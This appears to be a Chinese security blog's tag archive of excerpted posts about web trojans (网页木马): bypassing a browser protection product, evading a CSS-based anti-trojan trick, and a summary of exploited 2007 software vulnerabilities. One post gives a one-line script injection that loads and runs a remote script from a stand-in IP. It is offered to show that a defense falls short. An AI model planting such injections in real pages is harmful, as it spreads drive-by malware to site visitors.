标签 ‘网页木马’ 下的日志

绕过畅游巡警的网页木马防护

鬼仔注:前几天学校有点事,最近几天又忙着blog转换数据,再加上有点别的事,所以更新没跟上,刚才把这几天积攒的东西都发了。 :) 畅游巡警是大成天下这几天刚发布的新产品。这篇日志的前半部分是54nop的,后半部分是吴鲁加的,嘿嘿,综合了下。

————–54nop————–

畅游巡警介绍:
http://www.cnbeta.com/articles/54118.htm

绕过demo avi: (vmware录的,用klite codec pack播放)
http://bootshell.googlepages.com/SecPlugin_Bypass.rar
http://rapidshare.de/files/39213725/secplugin_bypass.rar.html

————–吴鲁加————–

畅游巡警发布测试版的第二天,在 54nop 的 Blog 的上看一篇《绕过畅游巡警的网页木马防护》,反而是有几分高兴,高兴的是:

阅读全文 »

Tags: , , ,

关于<<二行代码解决全部网页木马>>的文章

鬼仔注:前两天发过 <<二行代码解决全部网页木马>>

作者:lcx
来源:vbs小铺

原文在这:http://www.blueidea.com/tech/web/2008/5575.asp

主要目的是用css解决script标签里的http,这种方法治标不治本,我觉得防掉很难的,根治办法就是主机安全,不给别人黑掉的机会

突破方法有N种,最简单的突破办法,不把src=http放在<script>标签里。

代码:
<script>eval(document.write("<script src=http://192.168.8.100/1.js><\/script>"))</script>

Tags: ,

二行代码解决全部网页木马(含iframe/script木马)

鬼仔注:跟《一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》是同一作者。这篇文章是上次的增强。

作者:vickeychen
来源:经典论坛

  还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。

  前不久《一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂 阅读全文 »

Tags: ,

不安分的网页——网页木马的守株待兔

作者:小金
来源:网络技术论坛

一. 不安分的网页
职员李小姐这两个月来都觉得比较纳闷,为什么最近开很多网页都会跳出RealPlayer播放器,难道网络又开始了一轮视频播放形式新潮流?但是每次她都是等了很久也没看到有音乐或电影开始播放,久而久之,她已经习惯这个现象了,直到那一天,她保存在硬盘上的重要客户文档无缘无故被加了密,并且目录下多了个名为“要想恢复文档请将500元汇入帐号xxxxxxx”的文件……
当公司网络部的同事询问李小姐最近有没有发现什么异常现象时,李小姐才如梦方醒:打开网页怎么会跳出RealPlayer?RealPlayer一般不是都在网页里面播放的吗?

二. 你的地盘我做主:来自第三方工具的危害
随着安全危机的影响力逐渐扩大,许多网民的机器里都 阅读全文 »

Tags:

2007年度网马漏洞不完全总结

来源:网络巡警的博客

2007年度,网页木马层数不穷(其实从来也没少过),与以往稍微不同的是,在“黑客”玩烂经典网马漏洞了MS0-014和MS07-017之后,在使用了各种加密,跳转,框架包含之后,随着用户安全意识的提高(稍微高了那么一点点,知道打补丁了),系统漏洞的已经被最大限度地使用了,今年随着WEB讯雷惊暴漏洞之后,雅虎通漏洞,百度搜霸漏洞,PPStream ,暴风影音II,QQ场景,新浪UC ,MSN Messenger 视频漏洞,联众世界游戏大厅,各主流应用软件仿佛赶集似的出现0-Day漏洞,而且都以迅雷不及掩耳盗铃之势被病毒作者利用,往日为我们工资、学习和娱乐带来便捷和快乐的软件,仿佛一夜之间变得青面獠牙,成为病毒传播的快速通道!
阅读全文 »

Tags: , , , , ,

Ajax 让网页木马“悄悄的执行”

作者:空虚浪子心[X.G.C] http://cnxhacker.net
来源:IT168
原文地址:http://publish.it168.com/2007/0622/20070622010401.shtml

  关于Ajax的执行,开发人员是这样想的“Ajax要做到,在用户浏览网页时应该感觉不到的它的执行(异步),不需要等待页面刷新就可以自动完成验证数据”,比如用户名是否可以注册等。每当我想到“感觉不到的它的执行”这句话,就会联想到还有很多网络安全相关的东西(比如木马)都希望可以做到在用户感觉不到执行,或者可以在用户感觉不到的时候做些什么。

  许多“研究网络安全的朋友”都应该感觉到,微软的操作系统已经很久没有像以前那样可以“ms05039.exe www.microsoft.com 阅读全文 »

Tags: , ,